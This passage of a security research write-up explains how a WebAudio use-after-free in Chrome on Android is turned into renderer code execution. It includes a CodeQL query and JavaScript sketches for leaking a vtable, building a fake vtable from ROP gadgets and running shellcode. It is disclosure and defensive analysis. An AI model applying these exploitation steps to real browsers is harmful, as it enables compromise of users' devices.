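The delaying effect can be approximated with a toy first-in-first-out queue. This is a simplification that assumes a single queue with strictly ordered tasks, as the paragraph above describes; the task costs and names are hypothetical, and real main-thread scheduling has more moving parts.

```javascript
// Single-threaded FIFO task queue standing in for the main thread.
function runQueue(tasks) {
  let clock = 0;
  const startTimes = {};
  for (const task of tasks) {
    startTimes[task.name] = clock;  // a task starts when all earlier ones finish
    clock += task.costMs;
  }
  return startTimes;
}

// Hypothetical costs: 20 timer callbacks of 100 ms each, queued first.
const tasks = [];
for (let i = 0; i < 20; i++) tasks.push({ name: `timer${i}`, costMs: 100 });
tasks.push({ name: 'NotifyComplete', costMs: 1 });

const startTimes = runQueue(tasks);
console.log(startTimes.NotifyComplete); // 2000
```

In this model the AudioBus handed to NotifyComplete stays alive for the whole 2000 ms that the earlier tasks occupy.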

By using ffmpeg to create a silent mp3 file, I was able to create an AudioBus with a minimal length of 47. The length of an AudioBus from an AudioNodeInput is 128, and the backing store of an AudioBus holds floats plus padding (16 bytes on Android, 32 on x86). This means I can use the out-of-bounds read primitive to read an object of size between 204 (47 × 4 + 16) and 528 (128 × 4 + 16) bytes. A CodeQL query similar to what I used before can be used to identify such objects and select the appropriate length of the file to use:

    class FastMallocClass extends Class {
      FastMallocClass() {
        exists(Operator op, Function fastMalloc | op.hasName("operator new") and
          fastMalloc.hasName("FastMalloc") and op.calls(fastMalloc) and
          op.getDeclaringType() = this.getABaseClass*()
        )
      }
    }

    from FastMallocClass c
    where c.getSize() <= 528 and c.getSize() > 204
    select c, c.getLocation(), c.getSize()

Here I made the improvement to only include objects allocated in the FastMalloc partition, which is where the backing store (AudioArray) of AudioBus is allocated. Looking at the results, BiquadDSPKernel is particularly useful. Apart from allowing me to leak the vtable, it contains a field biquad_ that stores five AudioDoubleArray objects. This means that by leaking an object of type BiquadDSPKernel, I’ll also be able to leak the addresses of the backing stores of these AudioDoubleArray objects, which can then be used for storing a fake vtable to hijack virtual function calls.
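The size bounds in the query appear to follow directly from the frame counts and padding mentioned earlier. The short sketch below just reproduces that arithmetic. The function names are hypothetical, and it ignores any rounding the allocator applies when it places objects into size buckets.

```javascript
// Values taken from the text: floats are 4 bytes, padding is 16 bytes on Android.
const BYTES_PER_FLOAT = 4;
const ANDROID_PADDING = 16;

// Hypothetical helper: bytes needed by a backing store holding `frames` floats.
function backingStoreBytes(frames, padding) {
  return frames * BYTES_PER_FLOAT + padding;
}

// Shortest decoded bus (47 frames) and the 128-frame bus of an AudioNodeInput.
const minBytes = backingStoreBytes(47, ANDROID_PADDING);
const maxBytes = backingStoreBytes(128, ANDROID_PADDING);

// Hypothetical predicate mirroring the `where` clause of the query.
function inLeakableRange(objectSize) {
  return objectSize > minBytes && objectSize <= maxBytes;
}

console.log(minBytes, maxBytes);
```

On x86 the same helper would be called with a padding of 32, which shifts both bounds by 16 bytes.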

So by arranging the heap to place BiquadDSPKernel behind my AudioBus and then triggering the bug to cause an out-of-bounds read, I’m able to leak BiquadDSPKernel objects into the AudioBus of the AudioNodeInput of the next AudioNode. To read the input data, I can use a ScriptProcessorNode, which allows me to read the input using a JavaScript function. I can then obtain the leaked vtable and the addresses of the various AudioDoubleArray backing stores.
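Since the leaked object arrives in JavaScript as 32-bit float samples, the raw bytes have to be reinterpreted as 64-bit words before they can be treated as pointers. A minimal sketch of that step is shown below. The function name `samplesToQwords` is hypothetical, the sketch assumes the samples reach JavaScript bit-for-bit, and where the vtable and the AudioDoubleArray pointers sit inside the leaked data depends on the object layout, which is not reproduced here.

```javascript
// Reinterpret 32-bit float samples as little-endian 64-bit words without
// going through any numeric conversion (a DataView reads the raw bytes).
function samplesToQwords(samples) {
  const view = new DataView(samples.buffer, samples.byteOffset, samples.byteLength);
  const qwords = [];
  for (let offset = 0; offset + 8 <= view.byteLength; offset += 8) {
    qwords.push(view.getBigUint64(offset, true));
  }
  return qwords;
}

// Stand-in for leaked data: two made-up 64-bit values written into a buffer
// and then viewed as floats, the way a ScriptProcessorNode would see them.
const demoBytes = new DataView(new ArrayBuffer(16));
demoBytes.setBigUint64(0, 0x0000007a12345678n, true);
demoBytes.setBigUint64(8, 0x0000007b00001000n, true);
const demoSamples = new Float32Array(demoBytes.buffer);

for (const q of samplesToQwords(demoSamples)) {
  console.log("0x" + q.toString(16));
}
```

In a browser, the samples would come from the input buffer handed to the ScriptProcessorNode callback rather than from a hand-built buffer.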

Getting an RCE



At this point, the rest of the exploit is fairly standard. Once I obtain the address of the vtable of the BiquadDSPKernel, I can use it to find the load offset of libchrome.so. With that offset, I can locate the addresses of ROP gadgets inside libchrome.so and create a fake vtable in one of the AudioDoubleArray backing stores that belong to the BiquadDSPKernel, so that the virtual function pointers within this fake vtable point to gadgets of my choice.
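The address arithmetic in this step can be sketched as follows. Every offset below is a made-up placeholder, not a value from any real libchrome.so build, and the helper names are hypothetical. Because the fake vtable lives in an array of doubles, each pointer is encoded as the double with the same bit pattern. How those doubles end up in the AudioDoubleArray backing store is outside this sketch.

```javascript
// Hypothetical helper: library base = leaked vtable address minus the
// vtable's known offset inside the library.
function libraryBase(leakedVtable, vtableOffset) {
  return leakedVtable - vtableOffset;
}

// Encode a 64-bit pointer as the double that has the same bit pattern.
function pointerAsDouble(pointer) {
  const f64 = new Float64Array(1);
  const u64 = new BigUint64Array(f64.buffer);
  u64[0] = pointer;
  return f64[0];
}

// Hypothetical helper: one fake vtable slot per gadget offset.
function buildFakeVtable(base, gadgetOffsets) {
  return Float64Array.from(gadgetOffsets, (offset) => pointerAsDouble(base + offset));
}

// Placeholder values for illustration only.
const demoLeakedVtable = 0x7a15a3c2f0n;
const demoVtableOffset = 0x5a3c2f0n;
const demoBase = libraryBase(demoLeakedVtable, demoVtableOffset);
const demoVtable = buildFakeVtable(demoBase, [0x1000n, 0x2000n]);
console.log("0x" + demoBase.toString(16), demoVtable.length);
```

User-space pointers of this size map to very small non-NaN doubles, so the bit pattern survives being stored as a JavaScript number.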

After that, the use-after-free bug can be triggered once more. This time it goes directly down the path described in point two of the section “Primitives of the vulnerability” to call a virtual function. The free’d AudioHandler object can now be replaced by an AudioArray of appropriate size, filled with controlled data so that its vtable pointer points to the fake vtable that I created above.

Again, I use gadgets similar to the ones I used in my last post to call OS::SetPermissions and change the page permissions of the AudioDoubleArray backing stores in the BiquadDSPKernel to rwx. Once that is done, I can place shellcode in these AudioDoubleArray backing stores and trigger the bug once more to run arbitrary code. In the actual exploit, a DelayNode is used as the free’d AudioHandler and the feedforward coefficients of the IIRFilterNode are used to fake the DelayHandler.

The full exploit can be found here with some setup notes.

Conclusions

In this post, we’ve once again seen that complicated object cleanup, together with the subtlety of multi-threading, has led to vulnerabilities in WebAudio that are exploitable as renderer RCE. While vulnerabilities in Blink generally take more time to exploit than a bug in V8, Blink remains a large and viable attack surface for gaining (sandboxed) RCE in Chrome.

For the series as a whole, we also saw how the sandboxing architecture, together with the quick fixing of vulnerabilities in Chrome, really helped make it hard to obtain a full chain (and made sure that full chains don’t last long even if they make it into the wild). The renderer vulnerability used in this series took about six weeks to fix from when it was first reported, and the sandbox escape took a similar amount of time, which is fairly standard for Chrome. This greatly reduces the chance of renderer vulnerabilities overlapping with sandbox escapes. In the case of this series, the renderer vulnerability did not overlap with the sandbox escape in a stable version of Chrome because of this quick fixing of bugs. It is this efficiency of bug fixing that makes sandboxing much more effective.

On the other hand, we also saw from the sandbox escape post how once-per-boot-ASLR (i.e. processes forking from Zygote) greatly reduces the effectiveness of application sandboxing in Android. While the base address of Chrome is still randomized between the renderer and the browser, many other libraries are not, and I was still able to use gadgets within those libraries to escape the Chrome sandbox without much effort. Once-per-boot-ASLR is still very useful for mitigating remote attacks, as we have seen in this post, where most of the effort in writing the exploit went into defeating ASLR, but it is of little use against local privilege escalations. As both major platforms (Windows and Android) implement once-per-boot-ASLR, this remains one of the greatest weaknesses of the Chrome sandbox.